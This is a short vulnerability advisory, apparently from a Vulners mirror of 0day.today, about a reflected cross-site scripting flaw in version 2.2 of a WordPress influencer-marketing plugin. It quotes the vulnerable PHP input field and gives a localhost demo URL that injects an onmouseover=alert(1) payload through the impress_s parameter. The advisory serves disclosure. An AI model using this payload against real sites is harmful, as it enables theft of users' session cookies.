Lucene search
K

WordPress Influencer Marketing And Press Release System 2.2 XSS Vulnerability

🗓️ 18 Oct 2017 00:00:00Reported by Ricardo SanchezType 
zdt
 zdt
🔗 0day.today👁 23 Views

WordPress Influencer Marketing & Press Release System 2.2 XSS Vulnerabilit

Code
Credit  Ricardo Sanchez
Vulnerable Influencer Marketing & Press Release System plugin 2.2
Influencer Marketing & Press Release System plugin is prone to a
cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the "impress_s" value is not filter correcly
and it is possible bypassing the

sanitize_text_field() wordpress function:

<input type="text" id="impress_search_feed_input" name="impress_s"
value="<?php echo (isset($_GET['impress_s']) &&
!empty($_GET['impress_s'])) ? sanitize_text_field($_GET['impress_s'])
: ""; ?>" required="required" />


Demo url:*http://localhost/wordpress/wp-admin/admin.php?impress_s=
<http://localhost/wordpress/wp-admin/admin.php?impress_s=>"
onmouseover=alert(1)
display=&page=imkt_feed&impress_search_btn=impress_search_feed_btn*

#  0day.today [2018-02-15]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation